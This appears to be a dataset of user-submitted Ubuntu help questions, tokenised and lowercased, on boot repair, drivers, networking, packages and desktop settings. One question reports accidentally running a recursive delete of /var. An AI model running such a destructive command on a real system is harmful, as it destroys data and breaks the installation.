405087	find packages which files got deleted or missing after installation	i just accidentally did rm -r /var but luckily managed to ^c it before more damages were done . is there way to find out all packages which files got deleted in the location so i can reinstall them ? % ls -l /var total 20 drwxr-xr-x 2 root root 4096 jan 14 08:26 backups drwxr-xr-x 23 root root 4096 jan 6 20:26 cache drwxr-xr-x 70 root root 4096 jan 14 09:26 lib lrwxrwxrwx 1 root root 9 oct 31 17:53 lock - > /run/lock drwxrwsr-x 2 root mail 4096 oct 17 02:59 mail lrwxrwxrwx 1 root root 4 oct 31 17:53 run - > /run drwxr-xr-x 11 root root 4096 jan 10 22:06 spool
405088	frequently slow interface on ubuntu 12.10 , 12.04 , .	about my system : dual boot window7/ubuntu 12.10 ram : 1 gb cpu : intelâž pentium ( r ) 4 cpu 3.20ghz ă 2 os type : 32 bit disk : 50 gb driver : vesa : intel ( r ) 915g/915gv/910gl graphics experience : standard i have been using on this machine since , version 8.04 lts . but from , 10.04 , i have been having problem of slow interface , which happens , most of times , whenever i install updates . but not all update makes interface slow . so sometimes , i enjoy ubuntu with fast navigation . unity , gnome , unity 2d , all suffer from this problem . i also tried various kernel versions , but no change . i have not installed any proprietary drivers myself . slow interface : app laoding speeds , maximise minimise and everything else is sluggish and feels unresponsive . can some one give me idea , how to diagnose this issue , and resolve it , because it has been pestering since long time . ] this is result of top command ( when chrome , gedit , and one terminal was open , but still interface/gui navigation was slow ) : code : top - 05:05:36 up 19 min , 2 users , load average : 3.25 , 2.72 , 1.86 tasks : 162 total , 1 running , 161 sleeping , 0 stopped , 0 zombie % cpu ( s ) : 47.6 us , 5.5 sy , 0.2 ni , 24.2 id , 22.5 wa , 0.0 hi , 0.1 si , 0.0 st kib mem : 1018804 total , 942812 used , 75992 free , 10404 buffers kib swap : 1951740 total , 2612 used , 1949128 free , 364448 cached pid user pr ni virt res shr s % cpu % mem time+ command 2162 someone 20 0 407m 175m 31m s 81.9 17.6 14:07.98 compiz 1592 root 20 0 104m 49m 7348 s 18.9 5.0 1:58.85 xorg 3082 someone 20 0 95752 15m 10m s 6.3 1.5 0:02.26 gnome-terminal 3156 someone 20 0 5204 1276 980 r 6.3 0.1 0:00.01 top 1 root 20 0 3624 1892 1240 s 0.0 0.2 0:00.99 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.16 ksoftirqd/0 5 root 20 0 0 0 0 s 0.0 0.0 0:00.53 kworker/u:0 6 root rt 0 0 0 0 s 0.0 0.0 0:00.01 migration/0 7 root rt 0 0 0 0 s 0.0 0.0 0:00.00 watchdog/0 8 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/1 9 root 20 0 0 0 0 s 0.0 0.0 0:00.10 kworker/1:0 10 root 20 0 0 0 0 s 0.0 0.0 0:00.15 ksoftirqd/1 11 root rt 0 0 0 0 s 0.0 0.0 0:00.00 watchdog/1 12 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 cpuset 13 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 khelper 14 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kdevtmpfs
405089	share wifi . ubuntu pc needs to share widows 7 wifi to access internet	i have not found this exact question ( i think , or i just do n't get it ) . ** goal : get my ubuntu pc on the internet . ** ** problem : no direct network access at all on ubuntu . ** ** set-up : ** ubuntu 13.10 pc is directly connected via ethernet cable to windows 7 pc . windows 7 has shared internet connection option activated . windows 7 has 2 network connections : wifi to gateway/network and local one to ubuntu pc - both labeled with 'internet access ' . ubuntu connection has no internet access . only connected to windows pc locally . not sure of my vocabulary here . please speak newbie , or know-nothing-bie . thank you .
405091	video lens problem ubuntu 13.10	i have installed ubuntu 13.10 ( saucy ) , 64 bit version . i have about 120 videos on my drive of various formats ( mpeg , avi , wmv , flv , swf , mp4 , etc. ) . they are imported into shotwell ( along with a whole bunch of photos . ) all these photos and videos are located on an external hard drive connected to the laptop via a usb cable . when i try to use the video lens , i get this message : `` there are no videos currently available on this computer . '' the photo lens works perfectly . when i copy one of the videos to /home/user/videos , then the video lens `` sees '' that video . synaptic tells me that these packages are installed : unity-lens-video ; unity-scope-video-remote how do i make the video lens search for the videos on the attached external hard drive ? i 've searched this forum and others , google , etc . i ca n't find anything to help me fix this . i am grateful for any help with this .
405094	ics with ubuntu machine getting wireless internet and sharing that internet via ethernet to a windows 7 machine	have tried everything i could research on here such as putting the wired connection 1 to shared to other computers , but i feel like i 'm missing something or need to do something different to share to a windows computer via ethernet .
405099	no root file system is defined/ can not see any drives	tried installing 12.04 version and now the newest 13.10 and still getting the error that no root file system is defined and unlike other people who had problems i can not see any drives what so ever to select from . i have windows 7 installed already , first i tried leaving some 50gb unallocated for ubuntu , later used gparted while running ubuntu without installing to make a partition , still it did n't help .
405102	how to set a website as wallpaper in gnome	i 've been searching for about an hour right now . i ca n't seem to figure a way to set a website as the desktop background . any ideas ?
405103	dual monitors on different graphics inputs ?	here 's my dilemma , i was just running windows and to run both of my monitors , my secondary monitor was running off of my integrated chip . in my bios i set the boot up graphics device to be the integrated . my primary monitor is running off of my xfx r7950 . xfce however , does n't seem to be able to detect both of my monitors , only the one that is plugged into my integrated chip . my graphics card has two vga slots though , can i use both at the same time ?
405110	how to update list of installed packages	i want to install a new distro kubuntu 13.10 . currently i 'm running 12.04 . i have separate partitions for /usr and /boot and / ( root ) . i 'll install with same config and will format only / . i want to know that as all my installed applications will stay is /usr after installing new distro , is there any way to update list of installed packages , so that i wo n't be needing to re-install same packages ?
405112	shut down does n't shut down properly	my computer shut down fine until i decided to install the clementine music player . now when i go to shut it down it first closes the clementine window , and i have to go to the shut-down dialogue again . it does this about half the time , sometimes it shuts down immediately as it should . are there any shut down configs in the gconf or dconf editors that would solve this ? its not a major issue , but still an annoyance .
405114	tor browser on ubuntu 13.10	i have done extensive research , and yet there is no straightforward way to install the tor browser bundle on ubuntu 13.10 to work . can anybody help me install the tor browser bundle ? acer aspire v5 ubuntu 13.10
405115	rip mp3 rhythmbox	i ca n't rip mp3 music in rhythmbox error additional software is required to encode the multimedia files to your favorite format : mpeg-1 layer 3 ( mp3 ) encoder then the parameters passed to the application have an invalid format . please report a bug ! parameters were : - transient-for = 56623107 gstreamer | 1.0 | rhythmbox | mpeg-1 layer 3 ( mp3 ) encoder | encoder-audio/mpeg , mpegversion = ( int ) 1 , layer = ( int ) 3 thanks
405117	how to change an application icon	i would like to know if it 's possible to change an application permission in order to change the icon . in this case , it 's steam , situated at /usr/share/applications . i do n't know if i should change the permission of this one or the permission of the application itself situated at /usr/bin not very complicated but i hope someone will understand what i mean , else , how could i change the icon itself or if there 's any other alternatives . p.s . : the permissions are set for root thank you . edit : i tried alacarte , it 's great , exactly what i was looking for , exept that when i change the icon , i get a little x. i tried with different images an all the same . are there a specific image type i need to get ?
405120	how to call a custom executable or script in termnial directly with name ?	i created an executable file using gcc and put it into the ~/scode folder . how do i run it ? i tried typing just the name of the file but it responded with command not found . i believe there is a defined path the system uses to find executable but do n't know how to find out what paths there are . the executable file has the attributes rwxrwxr-x .
405124	how can i install ubuntu in a computer without an os ?	i got a computer from my office and ordered it to wipe it all from windows os . now how can i get ubuntu os on this computer ?
405125	how to deal with sleeping of magic trackpad ?	i paired apple magic trackpad with my precise , using hidd . and it works . but when i did not use it for long , like an hour , the connection was broken . hidd -- show could not list the device . i have to reboot the device and hidd -- search again . what should i do ?
405127	udev + xrandr to set display gamma when plugging in a display works briefly , but gets overridden	i 'm using a script like this to set the gamma values of my laptop screen and external monitor : # ! /bin/bash export display=:0 export xauthority=/home/peat/.xauthority xrandr -- output lvds1 -- gamma 0.7:0.7:0.4 xrandr -- output dp1 -- gamma 0.8:0.8:0.8 running it on startup or manually from the terminal works perfectly . however , when removing or plugging in a display , the gamma gets reset for all screens . i try to solve it by creating this udev rule in /etc/udev/rules.d/999_setmonitorgamma.rules : subsystem== '' drm '' , action== '' change '' , run+= '' /home/peat/scripts/setmonitorgamma.sh '' at what point it almost works . i can see the screen flash with the correct gamma for a brief instant , then the incorrect gamma gets applied again . it seems like there 's some sort of autodetection run after the udev rules get processed , that resets the display settings . how can i work around this ? running linux mint 16 , based on ubuntu 13.10
405129	can not replace a faulty disk using mdadm raid1	i have a software raid 1 array that i build a couple years ago . one day , after i loss current , the array became corrupted . one the drive was corrupted so , i removed it from the array and rezeroed it . now , i want to re-add it to the array . when i 'm doing the following command : mdadm -- add /dev/md0 /dev/sdb1 the command is executed and i can see if i run -- detail that the drive is rebuilding but this stays for a couple of seconds and then i get the following : i really do n't know how to resolve this issue
405130	lost all my old partitions while i installed ubuntu in win 8.1	i had win 8.1 in my computer and i had installed ubutu without dual boot mode and now my win 8.1 partitions and files of win 8.1 i cant see .how to get all the files and partitions i back
405135	how to install apropraite eclipse on ubuntu 12.04 lts ?	i want to know how can i install eclipse on ubuntu 12.04lts as i 'm new in both and want eclipse platform suitable for my java version `` 1.6.0_38 '' java ( tm ) se run-time environment ( build > 1.6.0_38-b05 ) java hot spot ( tm ) client v m ( build 20.13-b02 , mixed mode , sharing )
405137	get my windows 8.1 back	i had win8.1 in my computer and i hav installed ubuntu and now my computr boots directly to ubuntu and cant see any of my partitions and files . how to get it back or uninstall ununtu to get back win8.1
405138	decompile source .deb package to post it on launchpad	i want to upload .deb package from this solution to my launchpad repository , so that i could automate the process of installing specific packages for my laptop . a brief insight into the package contents showed that there are driver sources and installation script inside .
405142	chromium hacked ?	i have xubuntu 12.04 with chromium 31.0.1650.63 installed . occasionally , i will hear a very short audio ad come from my speakers . this will happen only when chromium is open , but it will happen when i only have websites up that i am sure do not have audio ads on them . if i close chromium , the audio stops . how do i stop this from happening ?
405143	.sources list missing	so earlier today i was at http : //www.ubuntugeek.com/how-to-install-skype-in-ubuntu-12-04precise.html trying to figure out how to install skype . i entered the first code : sudo apt-add-repository `` deb http : //archive.canonical.com/ $ ( lsb_release -sc ) partner and it displayed some error . anyways , i turned off my computer and went for a walk , when i came back and turned it on i got : malformed line 57 in source list so i went into terminal and entered : sudo gedit /ect/apt/sources.list and it was blank . i then went to the simply linux source list generator to see if i could just generate the list . when i went to click save it said , could not find the file ect/apt/sources.list so now i have no clue what to do , if i could get some help that would be great , thanks .
405145	make a custom iso of current ubuntu set up	i have been running on a dual boot of windows and 12.04 for quite some time now . primarily because of space constraints and the fact that i might not have booted into windows in the last 6 months , i would like to format the entire machine with ubuntu . while , i am aware of the method followed to remaster the original iso and make a custom one , i do not know how an iso of my current setup can be created . it is of utmost importance that i use my current setup because i 've configured my build according to the projects i work on . any help would be greatly appreciated !
405147	apt-get update wanted to download much more mb worth of packages than the disk space will be used to install them	i installed ubuntu 13.10 on virtualbox , ran apt-get update , then apt-get upgrade and faced the following message 246 upgraded , 0 newly installed , 0 to remove and 3 not upgraded . need to get 194 mb/203 mb of archives . after this operation , 6,602 kb of additional disk space will be used . the message basically says : 1 . 194-204 mb of packages ( why is n't it sure ? ) 2 . only ~6 mb of space will be used to install ~200 mb worth of packages how is this possible ?
405148	removed dconf-service accidentally and now machine is not booting up	i have removed dconf-service accidentally and now machine is not booting up , please tell how can i resolve this issue .
405151	how to open /opt folder in ubuntu 13.04	i installed ubuntu 13.04 in the gui file manager i dont file `` file system '' which take me to / how to access /opt in file manager
405154	proxy settings for a single website	in kde i can set manual proxies and in exception use particular site like youtube here shown in screenshot use that proxies only and all other sites load normally , my question is how can i do that in unity or gnome , so that only youtube can use these proxies ?
405157	some programs run on startup	every time i boot my laptop , two terminal window , a document viewer and a folder starts up . here is screenshot . i deleted the folder so it does n't start up . how do i disable it ?
405161	how to enable mouse wheel zoom on gnome 3.10 - ubuntu 13.10 ?	i 'm currently using gnome 3.10 on my ubuntu 13.10 . i saw a video which said that we could do that on unity by using compiz , but when i tried on gnome , did n't work at all . i also tried using a ppa with a software that would do that . the code i found is this one : sudo add-apt-repository ppa : tobias-quinn/gsmz sudo apt-get update sudo apt-get install gnome-shell-mousewheel-zoom it did n't work either . can someone help me with this little problem ? i would like this tool because i make video tutorials and since kdenlive ca n't give a proper zoom on the video , the only way i have is by trying some software .
405165	how to install the latest version of vlc ( 2.1.2 ) on ubuntu 12.04 ?	i need play video in ultra-hd 4k definition ( 3840ă2160 pixels ) and my favorite player is vlc . in ubuntu 12.04 lts the latest available version of vlc is 2.0.8 which does not have support for this type of videos and need to update to the latest available version of vlc ( 2.1.2 ) . how i can install the latest stable version of vlc on ubuntu 12.04 ?
405169	menu bar flashes and unity menu does not display under saucy	i 'm running a fairly new installation of saucy on a ( mostly ) stock dell dimension 9150 . my menu bar started flashing today ; actually , the upper quarter of my screen flashes erratically unless i 'm running a fullscreen application . the unity menu also refuses to show . i can search and launch applications on it , but i 'm flying blind with it . i 'm new to ubuntu but not computers in general , so i did some searching and found my graphics card , a radeon x300 , is supposedly supported well under the default open source display drivers , and the fact that the flashing stops with a fullscreen application and the fact that the unity menu stopped appearing around the same time would lead me to guess it 's a unity issue . i 've looked through lots of other unity problems but could n't find my exact problem and none of the solutions i 've tried have worked ( unity-reset , unity -- replace , etc. ) . thanks in advance for your help !
405170	problem in installing claws-mail	i tried to install claws-mail ; but got the response that follows . please help me fix the error . baranidaran @ baranidaran-lifebook-ah502 : ~ $ sudo apt-get install claws-mail [ sudo ] password for baranidaran : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libstlport4.6ldbl thunderbird-globalmenu gwibber-service libgtkspell-3-0 gir1.2-ubuntuoneui-3.0 libreoffice-emailmerge libgwibber-gtk2 libcmis-0.2-0 libubuntuoneui-3.0-1 python-speechd gwibber-service-twitter liblouis2 python-brlapi libgwibber2 python-louis gwibber-service-identica python-libproxy python-egenix-mxdatetime python-egenix-mxtools python-pyatspi2 gwibber-service-facebook liblouis-data gstreamer0.10-gnonlin use 'apt-get autoremove ' to remove them . the following extra packages will be installed : claws-mail-i18n suggested packages : claws-mail-doc claws-mail-tools the following new packages will be installed : claws-mail claws-mail-i18n 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . need to get 3,523 kb of archives . after this operation , 9,933 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ precise/universe claws-mail i386 3.8.0-1ubuntu1 [ 1,577 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ precise/universe claws-mail-i18n all 3.8.0-1ubuntu1 [ 1,946 kb ] 64 % [ 2 claws-mail-i18n 684 kb/1,946 kb 35 % ] 64 % [ 2 claws-mail-i18n 684 kb/1,946 kb 35 % ] get:3 http : //in.archive.ubuntu.com/ubuntu/precise/universe claws-mail-i18n all 3.8.0-1ubuntu1 [ 1,946 kb ] fetched 2,838 kb in 11min 30s ( 4,110 b/s ) selecting previously unselected package claws-mail . ( reading database ... 238749 files and directories currently installed . ) unpacking claws-mail ( from ... /claws-mail_3.8.0-1ubuntu1_i386.deb ) ... selecting previously unselected package claws-mail-i18n . unpacking claws-mail-i18n ( from ... /claws-mail-i18n_3.8.0-1ubuntu1_all.deb ) ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for hicolor-icon-theme ... setting up qmail ( 1.06-4 ) ... the hostname -f command returned : $ 1 your system needs to have a fully qualified domain name ( fqdn ) in order to install the var-qmail packages . installation aborted . dpkg : error processing qmail ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of qmail-run : qmail-run depends on qmail ( > = 1.06-2.1 ) ; however : package qmail is not configured yet . dpkg : error processing qmail-run ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already setting up claws-mail ( 3.8.0-1ubuntu1 ) ... setting up claws-mail-i18n ( 3.8.0-1ubuntu1 ) ... errors were encountered while processing : qmail qmail-run e : sub-process /usr/bin/dpkg returned an error code ( 1 )
405175	kernel panic occures when starting a download	so the story in short : i bought a brand new pc , then successfully installed 13.10 . i was happy at the first 10 minutes then suddenly black screen , and a kernel panic ... then i tryed a 12.04 lts but it 's the same ... i can recreate the panic , by simply starting a download from a browser , or trying to download updates . the first thing i notice that the wi-fi turns off , and then bam . i 've runned a memtest , but it did n't find any problems . tryed to check the kernel and system log , but all i see is 00/00/00/00-s with a red background in the log files . i 've tryed to search for a solution , but those problems did n't had these symptons . you see , i use ubuntu for 5 years , and never ever had any problems , so i do n't realy know what is going under the hood ... my pc 's specs : asrock b85m-hds mainboard intel core i5-4570 cpu kingston hyperx pnp 2x4gb ddr3 1600mhz khx1600c9d3p1k2/8g ram western digital 1tb 64mb wd10ezex hdd and also , to connect to the internet i use a tp-link tl-wn722n wi-fi stick . ohh and some part of the kernel panic : bug : unable to handle kernel null pointer dereference at 00000000000005b8 ip : [ < ffffffff8153f73a > ] handle_stopped_endpoint.isra.38+0x7/a0x280 kernel panic - not syncing : fatal exception in interrupt drm_kms_helper : panic occured , switching back to text console
405176	shortcut to open terminal and run some commands	is it possible to create desktop shortcut , that would do as follows : 1. open terminal 2. change directory 3. make a command inside that directory 4. type password ( sudo ) i tried with terminal profiles , but i did n't find option for 2. and 4 .
405177	can i install a mac-like taskbar ?	i read somewhere that you can use a taskbar like the one in mac . i have problems with adapting to the unity launcher . can someone please help me with this ? thanks in advance .
405179	wallpaper going under bar	i 'm having wallpaper problems , the wallpaper is going under my toolbar and iconbar and whatnot and i 'm not exactly sure what to do about it . i 've played around with the appearance settings but no dice . this is n't the most complex ubuntu problem but i 'm sure it still fits here .
405182	touchpad not working in desktop dell vostro 2520 ubuntu 12.04	the mouse pad for my recently purchased dell vostro 2520 suddenly stopped working in desktop . no response . when tried to shutdown through terminal message as 'try -- shutdown help' new to ubuntu ... .help . can not work . how to get it to work .
405183	capture section of the screen in gif	i am looking for a small application that allows to capture a screen section and directly render to a gif file . is there any application that does this ? i searched a lot , but i did n't find one compatible with linux/ubuntu ...
405187	what is `` make png '' command for ?	i have a source code that should be compiled to create some executable files . the code is : # -- -- -- -- -- -- -- -- -- -- -- -- - # for executable file # -- -- -- -- -- -- -- -- -- -- -- -- - executables : chmod 754 $ ( bin_dir ) *.sh ; \ cd $ ( src_bin_dir ) ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make -f makefile2 cc= $ ( cc ) cflags= '' $ ( cflags ) '' fc= $ ( fc ) fcflags= '' $ ( fcflags ) '' ; \ cd btop ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' fc= $ ( fc ) fcflags= '' $ ( fcflags ) '' ; \ cd ../sw ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; make install ; \ cd ../yhym_sup ; make cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; make cp ; # -- -- -- -- -- -- -- -- -- -- -- -- - # option ( png related ) # -- -- -- -- -- -- -- -- -- -- -- -- - png : cd $ ( src_lib_dir ) image ; \make -f makepng cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ cd ../../bin ; \ make y_asc2png cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make y_asc2png2mm cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make y_mkpng_point_facc cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ make y_asc2png_all cc= $ ( cc ) cflags= '' $ ( cflags ) '' ; \ # -- -- -- -- -- -- -- -- -- -- -- -- - # todo # -- -- -- -- -- -- -- -- -- -- -- -- - # ./configure script how should i use the makepng command to compile it successfully ?
405189	grub do n't find windows 7 loader . ca n't boot to windows after installing linux help	last week i installed ubuntu 13.10 on my windows 7 system and now i am trying to boot into windows and i ca n't do it . i installed grub-2 and i tried to boot to windows from there but i ca n't see the windows loader . so is there a way to add windows boot to grub so i can do dual boot with windows and linux ? i checked and the files are all there . i also used the windows cd to recover my boot image and still nothing happened . can anybody help me ? thanks !
405193	could not write bytes : broken pipe and now just a black screen	i have a x64 system - dual boot with ubuntu 12.04 and windows 8 . everything was working fine till now . yesterday , i enabled the 'hibernate ' option on ubuntu after checking if my system was compatible with it . also , for android sdk i installed ia32-libs package . all was working well . after that , i put ubuntu on hibernate and switched to windows 8 . later , i restarted and chose ubuntu . this time it gave me an error `` could not write bytes : broken pipe '' . i searched the forum , found some answers , none of them seemed to work . either i am doing something wrong or the problem is something else . i followed those answers , tried to get a system log from root shell prompt , but that gave me an error . then , tried to use this command : sudo apt-get install xserver-xorg-all xserver-xorge-video-all gave me a 'could not locate the package ' error . lightdm does n't work either . i booted through a live cd and ran boot repair . now , the message `` could not write bytes : broken pipe '' has disappeared but the black screen remains . i tried the 'nomodeset ' option , but then the screen freezes at the ubuntu loading image . my system config : - i5 3210 radeon hd 7670m 6 gb ram 750 gb hdd any help will be appreciated . i am fairly new to ubuntu , a noob . thank you in advance .
405194	remove folders from encfs control	i have encrypted a few folders with encfs . i no longer want to do so ; i want these folders unencrypted as before . how do i remove the folders from encfs control ? thx
405197	after installing ubuntu windows is not showing in grub	recently for one project i installed 64-bit ubuntu ( initially it was ubuntu 32-bit ) in my college lab machine . but the problem is after installing 64-bit it is not showing me the windows in grub while booting and that windows is genuine which was purchased by my college ( for my own machine i do n't need windows ) . i tried many things to update it 's grub but no result found . if i replace the 64-bit with 32-bit ubuntu it will show windows option in grub menu . why generally this kind of problems will happen ? . ca n't we solve it with out replacing the 64-bit with 32-bit ?
405198	alt+shift changes keyboard layout only one way	i am using xubuntu 13.10 . while i am using the xfce environment all is fine , but when i change to the gnome the alt+shift shortcut wo n't work properly . i know there is a known bug in 13.10 with this shortcut . the thing is that when i 'm switching from bg to en , it works just fine . but when i 'm typing in en and i press alt+shift to change to bg it changes only the sign in the notification area to bg , but it continues typing in en . and this happens only in gnome 3 .
405202	installing rails : errno : :econnrefused : connection refused	i 'm using vmware . parent os is windows 7 and guest os ( where i want to install rails ) is ubuntu 12.04 . parent have dial-up broadband internet connection . in vmware , network connection for child os is : nat . here i attached installation log : noted that , i 've installed rvm successfully . any help will be great .
405203	is it possible to download all mp3s from a domain or url ?	i 'd like to download all mp3s from the blog pinchy & friends . i tried the script for mp3 in `` http : //www.pinchyandfriends.com/dl.php ? mp3=*.mp3 '' ; do wget `` http : //www.pinchyandfriends.com/dl.php ? mp3= $ { mp3 } .mp3 '' sleep 5 done but all that results in is an attempt to download the literal http : //www.pinchyandfriends.com/dl.php ? mp3=*.mp3 . am i misunderstanding something about the script i wrote and/or is there a better way to do what i 'm attempting ? thanks in advance .
405205	no unity after login to main user account	yesterday my computer stayed open all night and then when battery was empty it turned off . its normal for my computer . but when at morning i turned it on , there was n't login screen . it crashed everytime . after reinstalling xorg , lightdm , ubuntu-desktop and doing some other things login screen appeared . but after login i can see only my desktop and system crashed warnings that appears in ubuntu from times when unity came . in guest mode everything works well . i created new user and assigned him as admin ( all privilages ) and logged in to his account . now i 'm writing from that user account and everything works very well . so , how i can restore my main account ? selecting unity plugin from ccsm not worked ( login to user account , go to tty1 and entering export display=:0 and then ccsm + switching to f7 ) . + reinstalled ccsm half of space in ssd is empty , so its not memory problem . wallpaper in its place : d
405209	how to start x without logging in console ?	my filesystem is based on ubuntu server and i installed xorg and openbox on it . i 've made it auto-login and auto startx , but when boot and shutdown , i can always see the root @ arm : # or something like that on the top-left corner of the screen . i want to hide it . i know that ubuntu desktop use lightdm as a service and start x without logging into terminal , say , tty1 , can i make it myself ? thanks !
405213	how to add route after connecting to openvpn server ?	i 'm trying for several days now to solve my problem . i have been using openvpn for windows for quite a while and after replacing windows with ubuntu 13.10 , i was happy to see that openvpn is available for ubuntu as well . i copied my settings from windows and in /var/log/syslog i see that my connection is successfully created . however , no matter what i do , i 'm unable to set routes . in windows , this was simply done by script that worked as follows ( ip addresses slightly differ since i have to keep them private ) : c : \windows\system32\route.exe delete 55.78.16.20 c : \windows\system32\route.exe delete 55.78.16.0 del tmp.cmd c : \windows\system32\route.exe print | grep.exe -m1 `` ^ *0.0.0.0 '' | sed.exe s/\x20\x20*/\t/g | cut.exe -f4 | sed `` s/ . */c : \\windows\\system32\\route.exe add 55.78.16.20 mask 255.255.255.255 & / '' > tmp.cmd c : \windows\system32\route.exe print | grep `` ^ *172.16.0.1 '' | sed s/\x20\x20*/\t/g | cut -f4 | sed `` s/ . */c : \\windows\\system32\\route.exe add 55.78.16.0 mask 255.255.255.0 & / '' > > tmp.cmd tmp.cmd after connection was set and above script was executed , connections to my servers went through vpn , while all other went normally . since this script uses grep , sed and cut , i figured i can easily `` translate '' it to linux . and i did it , except for the fact that i 'm a bit unsure how to use route command to set my connection properly . p.s . i also tried setting vpn using network manager , but the same question appears : how to add routes ? thx in advance
405218	asus wifi driver for 13.10 ( requires patch to work with kernel 3.11 )	i am new to ubuntu and need help installing a wifi driver for a asus pce n53 wireless card . i have read the instructions on the install disk and could not understand what i am to do . i have also read a bunch of the posts about how to install it and that it needs a patch to work . but i do n't know what i am to download and how to apply it . have no idea what i am doing and do n't want to mess something up . my setup is the following : dual boot with ubuntu 13.10 & windows 7 . msi z87-g43 intelâž coreâ˘ i7 processor 16 gb ram nvidia geforce gtx graphic card asus pce-n53 dual-band wireless-n600 pci-e adapter lspci -nn | grep 0280 showed : 04:00.0 network controller [ 0280 ] : ralink corp. device [ 1814:5592 ] `
405219	partitioning issues using gparted with linux	i 'm currently having issues in creating a new partition within the linux environment . currently , i 've enrolled myself in the security tube python scripting expert course , however when i created my vm on virtual box , i assigned only 8gb of disk space and forgot to change it . now , i 'm currently sitting at 100 % usage . i 've currently assigned 40.83gib of free unallocated space to the virtual disk space , however i 've assigned it to the fat32 file system instead of ext4 which currently has that 8gb of disk space ( which currently holds all my python course material . the partition name for ext4 is - /dev/sda1 . it 's mount point is named as : / i was wanting to see if i should do the following : format the file system that i assigned to fat32 to ext4 so it 's the same as the 7.5gib from there unmount the 40.83gib to the same mount point as /dev/sda1 which is the same as the 7.5gib i have asked a lot of people at work if they know how to carry out these tasks , they have said that i should run parted magic to doing any partitioning .
405226	gedit terminal palette issues , again	i 'm on ubuntu 12.04/precise with gnome 3.4.2 , running an xfce 4.8 desktop . i have gedit 3.4.1 with terminal plugin 3.3.4 . i 'm trying to set my colour scheme to 'solarized dark ' . in the screenshot below , the top half is a correctly set up gnome terminal . in the lower half , you can see the gedit terminal plugin - both displaying all ansi colours . as you can see , the colours do not match . ( note - i 've set the background colour of the gedit terminal to be lighter manually , as the contents become unreadable otherwise . it 's the highlighting colours not matching which is annoying me . these do not change if i set the background colour to something different . ) i have tried setting the configuration key org.gnome.gedit.plugins.terminal.palette to be empty and use-theme-colors to false ( that 's the current setting ) , i 've also tried copying the palette from gnome-terminal gconf to the gedit terminal dconf as described in other solutions [ 1 ] . i think gnome-terminal and gedit-terminal-plugin are rendering the same colour values differently ! how can i fix this ? [ 1 ] gedit embedded terminal uses incorrect palette
405228	can both nics be in the same subnet ?	i have a requirement for which i have to put both the interfaces ( eth0 and wlan0 ) of ubuntu 12.04 pc in the same subnet . as far as i understand , this should not create a problem but i wanted to confirm .
405231	how to get magic lamp effect on compiz to work properly	i am using magic lamp effect on compiz along with cairo dock . i have noticed a very weird behaviour . when i start an application from cairo , the magiclamp effect makes the new window to open from dock 's position . when i minimize the window , it moves to where unity launcher . is there a way to make the new window start and end from where it was firstly launched ?
405234	kde network notification on start-up at center	i have installed kubuntu 13.10 and after i login it show me a kde network notification on top-center screen . how can i disable or adjust this inconvenience . here is a screenshot :
405235	webpage does n't render in ubuntu ( tried firefox/chromium/browser ) but works in windows	for some reason , i ca n't view the following webpage : http : //areweb.berkeley.edu/courses/eep118/current/problemsets/ i asked a windows-using friend , and it works for them . when i try it , i get the following : anybody know what is causing this and how to fix ? edit : a deleted answer suggested that i `` ua spoofer '' ( a thing that pretends that i am using a different browser ) . weirdly , this works , but only if i switch browsers every time i load a new page of the main site . is this a clue for what is going on ?
405238	emerald missing close , maximize and minimize buttons when restoring window from maximized state	emerald is working fine . but when i restore a window which was maximized ; the close , maximize and minimize buttons are invisible . the buttons are there and working like if i move the cursor where the button suppose to be the drop down menu comes with the descriptions like close etc . but when an application is launching directly to non-maximized state then the buttons are visible . i 'm attaching a screenshot here : by the way , using ubuntu 13.10 64 bit . my hardware is : i5 cpu and 8 gb ram .
405242	how to use user defined keyboard shortcuts in kate 's terminal	recently i started using kate . i find it a really beautiful and powerful editor . it is also very convenient that the user can type commands by using the embedded terminal . one rather bizarre thing is that keyboard shortcuts can not be applied . if for instance i have selected and copied a command , by typing ctrl+v i can not paste it . the default keyboard sequence is ctrl+shift+v . it is really weird that kate does n't adopt terminal 's shortcut , but instead it uses it 's own . is there a way to modify this ?
405243	can i use my tv as a monitor ?	can i connect a new computer without a pre-installed os to my tv via hdmi and then install ubuntu ? will ubuntu be able to configure the hdmi connection as it installs itself , if you see what i mean ?
405244	deshaking videos using script	how can i desake my video ? i try to use transcode ? transcode -j stabilize -- mplayer_probe -i `` input.mts '' but it causes an segfault . trying to use ffmpeg filters : ffmpeg -i `` input.mts '' -vf vidstabdetect=shakiness=5 : show=1 out.avi ffmpeg -i `` input.mts '' -vf deshake out.avi but always have an eror `` no such filter '' . i want to create a simple nautilus script for this
405245	is there any way to recover a file that has been deleted with `` rm '' ?	i deleted a file with the command rm filename . is there anyway to recover this file , or is it permanently gone ?
405247	clone ubuntu with openssh-server , still asking for password	i have a ubuntu virtual machine with ssh installed . ( ubuntu 12 with gui ) i clone it and renew the clone ip address . i want that the master can have ssh to the clone without asking password . i had set id_dsa.pub and authorized_keys in the clone machine . however it still ask me password when i try to do ssh from the master machine to the clone machine . can i have any suggestion ? thanks
